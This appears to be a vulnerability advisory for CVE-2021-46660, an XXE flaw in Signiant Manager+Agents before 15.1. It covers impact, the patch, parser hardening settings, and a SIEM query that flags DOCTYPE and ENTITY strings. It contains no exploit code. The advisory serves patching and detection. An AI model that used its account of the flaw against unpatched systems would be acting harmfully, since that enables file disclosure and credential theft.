CVE-2021-46660
📋 TL;DR
This vulnerability in Signiant Manager+Agents allows attackers to perform XML External Entity (XXE) attacks by submitting malicious XML input. This could lead to sensitive data disclosure, server-side request forgery, or denial of service. Organizations using Signiant Manager+Agents versions before 15.1 are affected.
💻 Affected Systems
- Signiant Manager+Agents
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise including arbitrary file read, internal network reconnaissance, and potential remote code execution via XXE injection.
Likely Case
Sensitive configuration file disclosure, internal service enumeration, and potential credential theft from the Signiant system.
If Mitigated
Limited impact with proper network segmentation and XML parsing restrictions, potentially only denial of service.
🎯 Exploit Status
XXE vulnerabilities typically have low exploitation complexity and can be exploited without authentication.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 15.1 and later
Vendor Advisory: https://help.signiant.com/flight-deck/general/release-notes-15-1
Restart Required: Yes
Instructions:
1. Download Signiant Manager+Agents version 15.1 or later from official sources. 2. Backup current configuration. 3. Install the update following vendor instructions. 4. Restart Signiant services. 5. Verify functionality.
🔧 Temporary Workarounds
Disable XML External Entity Processing
allConfigure XML parsers to disable external entity resolution
Configure XML parser settings to: setFeature("http://xml.org/sax/features/external-general-entities", false); setFeature("http://xml.org/sax/features/external-parameter-entities", false);
Input Validation and Sanitization
allImplement strict input validation for XML data
Implement XML schema validation and reject XML containing DOCTYPE declarations
🧯 If You Can't Patch
- Implement network segmentation to isolate Signiant systems from sensitive internal networks
- Deploy web application firewall (WAF) with XXE protection rules
🔍 How to Verify
Check if Vulnerable:
Check Signiant Manager version via web interface or configuration files. Versions before 15.1 are vulnerable.Check Version:
Check Signiant Manager web interface or configuration files for version informationVerify Fix Applied:
Verify version is 15.1 or later and test XML parsing functionality with safe test payloads.📡 Detection & Monitoring
Log Indicators:
- Unusual XML parsing errors
- Large XML file uploads
- Requests containing DOCTYPE declarations
Network Indicators:
- HTTP requests with XML content containing external entity references
- Outbound connections to unexpected internal services
SIEM Query:
source="signiant" AND (message="*DOCTYPE*" OR message="*ENTITY*" OR message="*XML parsing error*")